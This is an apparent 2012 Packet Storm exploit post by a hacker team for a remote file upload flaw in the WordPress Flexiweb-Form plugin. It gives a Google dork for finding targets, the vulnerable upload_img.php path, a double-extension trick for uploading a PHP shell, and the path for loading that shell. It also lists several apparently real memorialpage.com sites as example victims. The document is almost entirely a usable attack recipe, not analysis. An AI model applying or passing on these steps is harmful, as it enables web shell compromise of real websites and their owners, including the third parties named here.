WordPress Flexiweb-Form Shell Upload

2012-07-04T00:00:00
ID PACKETSTORM:114475
Type packetstorm
Reporter Mr.XpR
Modified 2012-07-04T00:00:00

Description

                                        
                                            `##################################################################  
  
0101010101----010101010101010  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101010101  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
0101010101----0101 010  
  
##################################################################  
  
[+] Exploit Title : Word press flexiweb-form plugin Remote File Uploader  
  
[+] Google Dork : inurl:plugins/flexiweb-form/  
  
[+] Autor : Mr.XpR   
  
[+] Download : http://www.flexiweb.com.au  
  
[+] Researcher Team : IRaNHaCK Security Team  
  
[+] Bug Level : High (RFU)  
  
[+] Test : 7 , Linux Back Track  
  
##################################################################  
  
  
[+]Exploit  
  
[-] http://Site.il/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
  
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
  
[+]Sh3ll  
  
[-] Upload Shell PhP ==> Shell.PhP or Shell.PhP;.jpg  
  
[+]Load Shell  
  
[-] http://www.Site.il/patch/wp-content/plugins/flexiweb-form/images/Shell.php  
  
[+]Example :  
  
[-] http://michelle1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://augustop.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://augustoperella1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] More In Google ...  
  
  
Persian Gulf For Ever - Tnx To all Persian Hackerz  
  
Bax:  
  
Siamak Black - UnknowN - farbod ezrael - hell boy - all iranian hackerz   
`